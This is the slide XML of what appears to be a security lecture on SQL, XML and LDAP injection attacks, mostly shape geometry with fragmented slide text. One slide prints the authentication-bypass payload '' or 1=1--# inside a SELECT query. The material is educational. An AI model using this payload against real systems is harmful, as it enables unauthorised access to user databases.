                <a:lnTo>
                  <a:pt x="6014163" y="2843747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5973898" y="2861875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5931775" y="2876326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5887996" y="2886899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5842763" y="2893391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5796280" y="2895600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482600" y="2895600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436116" y="2893391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390883" y="2886899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347104" y="2876326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304981" y="2861875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264716" y="2843747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226510" y="2822145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190567" y="2797270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157087" y="2769325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126274" y="2738512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98329" y="2705032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73454" y="2669089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51852" y="2630883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33724" y="2590618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19273" y="2548495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8700" y="2504716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2208" y="2459483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2413000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="482600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662543" y="4422630"/>
            <a:ext cx="5681345" cy="1174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065" marR="5080">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="3905885" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15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au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ser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v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execut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	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pr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ces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7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 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ru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scrip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query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way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tha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not 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authorized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by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application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design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227629" y="3099625"/>
            <a:ext cx="4652010" cy="802005"/>
            <a:chOff x="9227629" y="3099625"/>
            <a:chExt cx="4652010" cy="802005"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9232392" y="3104388"/>
              <a:ext cx="4642485" cy="792480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4642484" h="792479">
                  <a:moveTo>
                    <a:pt x="4510023" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="132079" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90350" y="6738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54095" y="25497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25497" y="54095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6738" y="90350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6738" y="702129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25497" y="738384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54095" y="766982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90350" y="785741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132079" y="792479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4510023" y="792479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4551753" y="785741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4588008" y="766982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4616606" y="738384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4635365" y="702129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4642104" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4642104" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4635365" y="90350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4616606" y="54095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4588008" y="25497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4551753" y="6738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4510023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232392" y="3104388"/>
              <a:ext cx="4642485" cy="792480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4642484" h="792479">
                  <a:moveTo>
                    <a:pt x="0" y="132079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6738" y="90350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25497" y="54095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54095" y="25497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90350" y="6738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132079" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4510023" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4551753" y="6738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4588008" y="25497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4616606" y="54095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4635365" y="90350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4642104" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4642104" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4635365" y="702129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4616606" y="738384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4588008" y="766982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4551753" y="785741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4510023" y="792479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132079" y="792479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90350" y="785741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54095" y="766982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25497" y="738384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6738" y="702129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="132079"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9524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10280142" y="3304794"/>
            <a:ext cx="25469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5" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server-side</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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114" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:endParaRPr sz="2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53639" y="3133344"/>
            <a:ext cx="4650105" cy="832485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4650105" h="832485">
                <a:moveTo>
                  <a:pt x="4511040" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138684" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94853" y="7071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56784" y="26761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26761" y="56784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7071" y="94853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="138683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="693419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7071" y="737250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26761" y="775319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56784" y="805342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94853" y="825032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138684" y="832103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4511040" y="832103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4554870" y="825032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4592939" y="805342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4622962" y="775319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4642652" y="737250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4649724" y="693419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4649724" y="138683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4642652" y="94853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4622962" y="56784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4592939" y="26761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4554870" y="7071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4511040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475101" y="3354070"/>
            <a:ext cx="260794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25" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client-side</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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75" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attacks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18864" y="306451"/>
            <a:ext cx="8017509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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Structured</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Query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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Language</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks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8776" y="760476"/>
            <a:ext cx="11628120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52777" y="1865528"/>
            <a:ext cx="13359765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71525" marR="5080" indent="-759460">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="12204065" algn="l"/>
              </a:tabLst>
            </a:pP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SQL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jection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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ck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,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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thr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act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modifie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one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m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f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hese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four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basic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fu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ctions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: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	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selecting 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(SELECT),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inserting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(INSERT),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deleting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(DELETE),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updating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(UPDATE).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91283" y="3855720"/>
            <a:ext cx="6236335" cy="1359535"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6236334" h="1359535">
                <a:moveTo>
                  <a:pt x="6009640" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="226568" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180916" y="4604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138392" y="17809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99907" y="38703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66373" y="66373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38703" y="99907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17809" y="138392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4604" y="180916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="226567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1132839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4604" y="1178491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17809" y="1221015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38703" y="1259500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66373" y="1293034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99907" y="1320704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138392" y="1341598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180916" y="1354803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226568" y="1359407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6009640" y="1359407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6055291" y="1354803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6097815" y="1341598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6136300" y="1320704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6169834" y="1293034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6197504" y="1259500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6218398" y="1221015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6231603" y="1178491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6236208" y="1132839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6236208" y="226567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6231603" y="180916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6218398" y="138392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6197504" y="99907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6169834" y="66373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6136300" y="38703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6097815" y="17809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6055291" y="4604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6009640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206879" y="4101236"/>
            <a:ext cx="5601335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7185" marR="5080" indent="-325120">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>SQL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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>injects</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>SQL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statements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dirty="0" sz="2200" spc="-6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web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application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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via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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>user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input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FFFFFF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URL.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14144" y="5577840"/>
            <a:ext cx="6213475" cy="1396365"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6213475" h="1396365">
                <a:moveTo>
                  <a:pt x="5980683" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="232663" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185766" y="4725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142089" y="18280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102567" y="39728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68135" y="68135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39728" y="102567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18280" y="142089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4725" y="185766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="232663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1163320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4725" y="1210217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18280" y="1253894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39728" y="1293416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68135" y="1327848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102567" y="1356255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142089" y="1377703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185766" y="1391258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="232663" y="1395984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980683" y="1395984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6027581" y="1391258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6071258" y="1377703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6110780" y="1356255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6145212" y="1327848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6173619" y="1293416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6195067" y="1253894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6208622" y="1210217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6213348" y="1163320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6213348" y="232663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6208622" y="185766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6195067" y="142089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6173619" y="102567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6145212" y="68135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6110780" y="39728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6071258" y="18280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6027581" y="4725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980683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419350" y="5842509"/>
            <a:ext cx="5204460" cy="79057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70"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>SQL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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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shows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FFFFFF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inserts</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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database</a:t>
            </a:r>
            <a:endParaRPr sz="2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records.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302495" y="4738115"/>
            <a:ext cx="5440680" cy="1628139"/>
            <a:chOff x="9302495" y="4738115"/>
            <a:chExt cx="5440680" cy="1628139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57359" y="4738115"/>
              <a:ext cx="5385815" cy="162763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2495" y="5113007"/>
              <a:ext cx="4838700" cy="95251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409175" y="4788407"/>
              <a:ext cx="5260975" cy="1504315"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5260975" h="1504314">
                  <a:moveTo>
                    <a:pt x="5260847" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1504188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5260847" y="1504188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5260847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409175" y="4788407"/>
              <a:ext cx="5260975" cy="1504315"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5260975" h="1504314">
                  <a:moveTo>
                    <a:pt x="0" y="1504188"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5260847" y="1504188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5260847" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1504188"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="952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489440" y="5193283"/>
            <a:ext cx="4292600" cy="6356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 spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>FROM tbl_user WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-119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dirty="0" sz="2000" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1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dirty="0" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1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dirty="0" sz="2000" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'' or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1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dirty="0" sz="2000" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>1=1--#</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New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352788" y="4642154"/>
            <a:ext cx="5396865" cy="1755775"/>
            <a:chOff x="9352788" y="4642154"/>
            <a:chExt cx="5396865" cy="1755775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52788" y="4642154"/>
              <a:ext cx="5396484" cy="28188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398508" y="4687823"/>
              <a:ext cx="5282565" cy="167640"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5282565" h="167639">
                  <a:moveTo>
                    <a:pt x="5236209" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="45974" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28074" y="3611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13461" y="13462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611" y="28074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="45974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5282184" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5282184" y="45974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5278572" y="28074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5268721" y="13462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5254109" y="3611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5236209" y="0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52788" y="6246875"/>
              <a:ext cx="5396484" cy="15087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9398508" y="6292595"/>
              <a:ext cx="5282565" cy="36830"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5282565" h="36829">
                  <a:moveTo>
                    <a:pt x="5282184" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="36575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5282184" y="36575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5282184" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5396D3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83200" y="306451"/>
            <a:ext cx="568833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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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5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dirty="0" spc="-7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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks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07128" y="1933193"/>
            <a:ext cx="724408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Extensible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Markup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Language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(XML)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used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by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apps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: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5635" y="760476"/>
            <a:ext cx="8388096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224271" y="5087111"/>
            <a:ext cx="6179820" cy="3035935"/>
